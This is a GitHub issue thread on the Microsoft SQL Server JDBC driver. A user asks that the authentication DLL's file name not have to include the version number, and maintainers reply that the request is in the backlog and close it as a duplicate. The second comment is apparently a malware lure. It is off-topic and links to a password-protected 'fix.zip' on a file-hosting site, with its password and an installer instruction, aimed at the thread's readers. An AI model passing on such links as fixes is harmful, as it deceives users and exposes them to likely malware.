### ISSUE TITLE
Don't require version number in DLL

### ISSUE THREAD

**Issue by JDBC-0** [microsoft/mssql-jdbc#2502]
I learned the hard way that the single sign on feature with the authentication DLL only works if the driver finds the exact file name like "mssql-jdbc_auth-12.8.1.x64.dll". When I rename this DLL, authentication fails. I can rename the JAR file however.

Reason: we use the Ivy repository to store our third party libs and the main feature is to store different versions in different subfolders that can be referenced just by changing the version number. In the end, the file names of the libs can be equal which helps a lot for tools that reference those files as they don't need to change their references just when updating versions.

So, we can change the driver name:  "mssql-jdbc-12.8.1.jre11.jar" => "mssql-jdbc.jre11.jar", but not the DLL name "mssql-jdbc_auth-12.8.1.x64.dll" as the running driver won't find "his" DLL to work.

So we have to set this DLL file name in Ivy with the exact original file name including the version number ("mssql-jdbc_auth-12.8.1.x64.dll"). This leads to misc DLLs in the misc destination folders when deploying files from the Ivy repository and need to manually delete the older versioned DLLs to not mix up installation files.

BTW: I guess the DLL does not really change a lot during all the driver updates. Perhaps the very same code but needs to be renamed just for this version number in the file name.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by barryw-mssql** [comment]
Our goal is at some point to actually remove the need for the DLL altogether but at the moment it is still needed. We have received similar requests in the past to remove the version information in the DLL name and this is in our backlog. Unfortunately at this time we cannot provide any guidance on when either solution will be available.

Please let us know if you have any further questions on this topic.

Thx,
Barry

**Comment by Jeffery-Wasty** [comment]
We've had several requests for naming changes including [adding an architecture suffix](https://github.com/microsoft/mssql-jdbc/issues/1905) and (related to this issue) [making the name of the auth DLL configurable](https://github.com/microsoft/mssql-jdbc/issues/1850). In order to cut down on the number of issues, we'll be closing this one as a duplicate, and keep the other ones up to track progress on this feature request.
